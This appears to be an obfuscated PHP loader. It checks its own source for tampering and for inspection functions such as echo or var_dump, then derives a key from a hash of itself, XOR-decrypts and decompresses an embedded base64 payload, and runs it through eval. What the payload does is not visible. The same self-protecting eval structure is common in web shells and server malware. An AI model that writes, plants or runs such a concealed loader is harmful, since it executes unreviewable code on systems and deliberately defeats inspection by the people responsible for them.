<?php
$yboaot="c6f724e869bfa9b86558750cbb251703";
$cigigicuakk="500003070307540f525a565453005208060d530c025652535606530200555201";
$yhjiqginhs="RqQ0WjMCIbHLcbZSNhKLJp0YbEnfMK0Q1wLbsVdRQ7vrTMQulSTaUxMmPsNby/9Myx+fhyZkf7qp/N+oMrpxfoRUxzNvL9TRzqmOh/R4pkXl001ujZWR1ZTFbJNKAPdHNGmSEUggaP4zUtoSTpm0HTooBgEvc2+JICTxF35sP/D2beXvLru9l6FaI78tIYlAHz2UaMW9D6G5HRfEshGlHOMbQd/u6/LGCM+6fUnpSmibcdjBaT2iag2fbnJ95WmjxfdRmPcf14U6T+MXBh8OwvjOX8HdqMj0riQPc7ZqfekteVJA+QWiwsInEuGTq//bmqrbabySBmy+Lg8pEmwzPWl3bcCc1wDgglD+72zvQmbIvrkNEwubpIhOBNSAUwJdvRNuvYA69xAnLcGN+FXLNw==";
$nydzyvgan=file_get_contents(__FILE__);
$ujpfsbhzfaw=str_replace($yhjiqginhs,"",$nydzyvgan);
if(strpos($ujpfsbhzfaw,"ec"."ho")!==false||strpos($ujpfsbhzfaw,"pr"."int")!==false||strpos($ujpfsbhzfaw,"var_"."dump")!==false||strpos($ujpfsbhzfaw,"file_put_"."contents")!==false||strpos($ujpfsbhzfaw,"fw"."rite")!==false){die();}
$chrwpuoav=str_replace(array($yboaot,$cigigicuakk),array("SP_8600b682","KP_8b78d2d0"),$nydzyvgan);
$pxsebeymphv=md5($chrwpuoav);
$ewahtqxjtj=hex2bin($cigigicuakk);
$ncczewtonz="";
$uuiucl=strlen($pxsebeymphv);
for($fmozyx=0;$fmozyx<$uuiucl;$fmozyx++){
    $ncczewtonz.=chr(ord($ewahtqxjtj[$fmozyx])^ord($pxsebeymphv[$fmozyx]));
}
$eoudgxc=base64_decode($yhjiqginhs);
$rcqqevfb=strlen($eoudgxc);
$aifjguxy="";
$aotdgdfhyc=strlen($ncczewtonz);
for($fmozyx=0;$fmozyx<$rcqqevfb;$fmozyx++){
    $aifjguxy.=$eoudgxc[$fmozyx]^$ncczewtonz[$fmozyx%$aotdgdfhyc];
}
$seiyflgwfvop="gz"."in"."fl"."ate";
eval($seiyflgwfvop($aifjguxy));
